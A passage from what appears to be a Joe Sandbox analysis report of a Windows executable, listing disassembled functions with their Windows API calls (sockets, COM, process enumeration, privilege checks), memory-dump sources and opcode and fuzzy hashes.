                                                    • bind.WSOCK32(00000000,?,00000010), ref: 0067661A
                                                    • listen.WSOCK32(00000000,00000005), ref: 00676629
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676643
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00676657
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 4579469bf6a01cd7d9723258c0877ad82e1cbda44723862954bbbeed99cf8b2c
                                                    • Instruction ID: 27e60a3ff19f0964c766028a3d8aff95b8f709a12f2c4fe78feea27d9df2536c
                                                    • Opcode Fuzzy Hash: 4579469bf6a01cd7d9723258c0877ad82e1cbda44723862954bbbeed99cf8b2c
                                                    • Instruction Fuzzy Hash: F6219E70600600AFDB14AF64D849A6EB7BBEF44320F148259F95AE73D2CB70AD01CB65
                                                    Function 00601287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 006019FA
                                                    • GetSysColor.USER32(0000000F), ref: 00601A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 00601A61
                                                      • Part of subcall function 00601290: DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 2530d30ddc796a9818d49d8c3a6869a6457ff0b1714cce759b5fa30ed0017822
                                                    • Instruction ID: 98dc97f4cfafa35a624c848a54bd82df0e2bd1f504176596b4c11451b69a6f8b
                                                    • Opcode Fuzzy Hash: 2530d30ddc796a9818d49d8c3a6869a6457ff0b1714cce759b5fa30ed0017822
                                                    • Instruction Fuzzy Hash: E5A13570286544BAD73DABA88C58EFB359FDB43351F14121EF502DE2D2CE258D0293B9
                                                    Function 00676A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00676AB1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676ADA
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00676B13
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676B20
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00676B34
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 297c3757312482906f7e28be90e1e0e6e917a2649a1158335ce524759ef24ede
                                                    • Instruction ID: cccab43ffd797f7e2da3e6130edec98cc720364ffc87ee3638299e35a5ec89c0
                                                    • Opcode Fuzzy Hash: 297c3757312482906f7e28be90e1e0e6e917a2649a1158335ce524759ef24ede
                                                    • Instruction Fuzzy Hash: E941B175740610AFEB54AB68DC86F6F77ABDB44710F04815CF94AAB3C3CA709D0087A5
                                                    Function 006855FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 018ad0ab55a33479dbaca0f51374dc8b10761b41e7fad5759657c9a2d0e9aded
                                                    • Instruction ID: 0572cd3b75a535f6bb1faa0113d7e869cdd26cfcbfd25e7be25981b5461a54ee
                                                    • Opcode Fuzzy Hash: 018ad0ab55a33479dbaca0f51374dc8b10761b41e7fad5759657c9a2d0e9aded
                                                    • Instruction Fuzzy Hash: 7811B231740A116FE7212F26DC44A6B7B9BEF54721B804239F807D7261EB7099828BA9
                                                    Function 0066C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0066C69D
                                                    • CoCreateInstance.OLE32(00692D6C,00000000,00000001,00692BDC,?), ref: 0066C6B5
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • CoUninitialize.OLE32 ref: 0066C922
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 293674c381759d8e6cdd038d2b4e4a3292fa744fc943ec0f67f6cd05eacc6e05
                                                    • Instruction ID: 3a293dc6cd2a1ef5e011e4e15cfa22a9e60d37ee0fe517ab4562fc1eae5d886c
                                                    • Opcode Fuzzy Hash: 293674c381759d8e6cdd038d2b4e4a3292fa744fc943ec0f67f6cd05eacc6e05
                                                    • Instruction Fuzzy Hash: BCA13A71244205AFD744EF54C891EABB7EAEF98304F00491CF196971E2EB70AA49CB66
                                                    Function 0067C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00641D88,?), ref: 0067C312
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067C324
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 5d2dab3486891e891a9edbc7a5126ba9d7063f90d27891b15272ac50f884b1e0
                                                    • Instruction ID: 57ab83ddc36f08577f985f2ddcc3c3303f0566e3c64251a072f3500f27f35c55
                                                    • Opcode Fuzzy Hash: 5d2dab3486891e891a9edbc7a5126ba9d7063f90d27891b15272ac50f884b1e0
                                                    • Instruction Fuzzy Hash: 29E0EC75600713DFDB209F25D818A9676E6EB08775B80D53DE899D2250E770D881CBA0
                                                    Function 0067F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0067F151
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0067F15F
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0067F21F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0067F22E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: 7b64a089304b0a8c363e1eff407efe04a23c1c7be2348ee98f5696021ee45cf0
                                                    • Instruction ID: f84586f244f122583f39095fd9a1f8a93d6e2ad74adabf1508749081cc31f393
                                                    • Opcode Fuzzy Hash: 7b64a089304b0a8c363e1eff407efe04a23c1c7be2348ee98f5696021ee45cf0
                                                    • Instruction Fuzzy Hash: 28519F71504300AFD354EF24DC85E6BBBEAFF98710F50492DF49697292EB70AA04CB96
                                                    Function 0065EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0065EB19
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: 33c0d96d776ebc99fecc091858b2c580615592c6ae19c8160c4e244e6fe26806
                                                    • Instruction ID: aaeacd05f2f33c010723609f215a72e3bde31fbfacd5678128c95133bd0cd1d9
                                                    • Opcode Fuzzy Hash: 33c0d96d776ebc99fecc091858b2c580615592c6ae19c8160c4e244e6fe26806
                                                    • Instruction Fuzzy Hash: 26322775A006059FDB28CF19C481AAAB7F1FF48310F15C56EE89ADB3A1EB71E941CB44
                                                    Function 006725E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 006726D5
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0067270C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 091ab6b98546224666d7cd60d359df0a3eb28bd878fba81d761cd4591bd5394b
                                                    • Instruction ID: 12ed75361ccfb0e2b386174da8ce73b6ccddc331034e333160ac9793b9cd5b7d
                                                    • Opcode Fuzzy Hash: 091ab6b98546224666d7cd60d359df0a3eb28bd878fba81d761cd4591bd5394b
                                                    • Instruction Fuzzy Hash: 1D41D57190420ABFEB20DF94DD95EFBB7FEEB40714F10806EF609A6240EA719E419B54
                                                    Function 0066B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066B5AE
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0066B608
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0066B655
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 9a29a7014935f8a2d1d3c95988abaf60841a798bd152cc0ec37d5dbdfc6e1b1d
                                                    • Instruction ID: 5e5db2d5d02896a7cf238be4bae527ee935dd7f37c2932d2558f3446eb522ac2
                                                    • Opcode Fuzzy Hash: 9a29a7014935f8a2d1d3c95988abaf60841a798bd152cc0ec37d5dbdfc6e1b1d
                                                    • Instruction Fuzzy Hash: BF216035A00118EFCB00EFA5D884AAEBBBAFF49310F1480A9E845EB351DB319955CF55
                                                    Function 00658CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00658D0D
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658D3A
                                                    • GetLastError.KERNEL32 ref: 00658D47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: fd4c68df51a2500db3ed9438c6b5ae0fa360f69a6efcdfd78070a751ff6084ab
                                                    • Instruction ID: b8ef2610ea51c1eeff8b27d5be5c33dfe30b6464a629d25318ab816b557d3843
                                                    • Opcode Fuzzy Hash: fd4c68df51a2500db3ed9438c6b5ae0fa360f69a6efcdfd78070a751ff6084ab
                                                    • Instruction Fuzzy Hash: 1211BFB1414209AFE7289F54EC85D6BB7FEEF04711B20862EF84693641EF30AC408B60
                                                    Function 00664021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0066404B
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00664088
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00664091
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 2bb39d6c5ed19ec9b0119354dbc403cc877e1f2085064582f27f203994349d09
                                                    • Instruction ID: 5c0cbbf9ffa940249731d2e2f190a1b0f3d0df58dcb240c962465ef3b01b06c0
                                                    • Opcode Fuzzy Hash: 2bb39d6c5ed19ec9b0119354dbc403cc877e1f2085064582f27f203994349d09
                                                    • Instruction Fuzzy Hash: 7D117CB1900228BFE7109BE8DC48FABBBBDEB08710F000656BA04E7291C6745E4587A1
                                                    Function 00664C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00664C2C
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00664C43
                                                    • FreeSid.ADVAPI32(?), ref: 00664C53
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
                                                    • Instruction ID: 057f4673c1f98e589204f1ed6c5546c8fdbcab8206f9ab1e33836c929d79c745
                                                    • Opcode Fuzzy Hash: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
                                                    • Instruction Fuzzy Hash: B8F06D75A1130CBFDF04DFF0DC99ABEBBBDEF08201F1045A9AA01E2281E7746A548B50
                                                    Function 00668B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __time64.LIBCMT ref: 00668B25
                                                      • Part of subcall function 0062543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006691F8,00000000,?,?,?,?,006693A9,00000000,?), ref: 00625443
                                                      • Part of subcall function 0062543A: __aulldiv.LIBCMT ref: 00625463
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID: 0ul
                                                    • API String ID: 2893107130-3446053954
                                                    • Opcode ID: e0bbf6076b817f2e7b453bb8a803ae22f034db9e41387408b6cfe936cee83196
                                                    • Instruction ID: 8218f15f7513b4687ab3d578d10b6226a80fa1ba6ff02e6b985842fb9061032f
                                                    • Opcode Fuzzy Hash: e0bbf6076b817f2e7b453bb8a803ae22f034db9e41387408b6cfe936cee83196
                                                    • Instruction Fuzzy Hash: 7321C0726255108FC329CF35D441AA2B3E2EBA4311B288E6CD0E5CB2D0CA74B905CB94
                                                    Function 0060E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5a5c15ccca11c1a6c93d054b7fc2283b74795f098b1f222a8a0a7be579e6b22
                                                    • Instruction ID: 645a790532ada6a05e9f935ced89b478f318a74e6fa88dc1d75e2ba28b334226
                                                    • Opcode Fuzzy Hash: c5a5c15ccca11c1a6c93d054b7fc2283b74795f098b1f222a8a0a7be579e6b22
                                                    • Instruction Fuzzy Hash: B0229274A40225CFDB28DF54C480AAFBBF2FF14300F148969E8569B391E776AD85CB91
                                                    Function 0066C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066C966
                                                    • FindClose.KERNEL32(00000000), ref: 0066C996
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 07a1575ababaca6aeda2e63a55e7d512708bf97a9648b99d7442d9e6d697d10b
                                                    • Instruction ID: c3db59d2af347d306cf65c0b62605aa16c8c39b48e4405aae02192653bbddc27
                                                    • Opcode Fuzzy Hash: 07a1575ababaca6aeda2e63a55e7d512708bf97a9648b99d7442d9e6d697d10b
                                                    • Instruction Fuzzy Hash: BE11A1326106009FD710EF29C845A2BF7EAFF84320F04861EF8A9D7291DB30AC00CB95
                                                    Function 0066A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0067977D,?,0068FB84,?), ref: 0066A302
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0067977D,?,0068FB84,?), ref: 0066A314
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
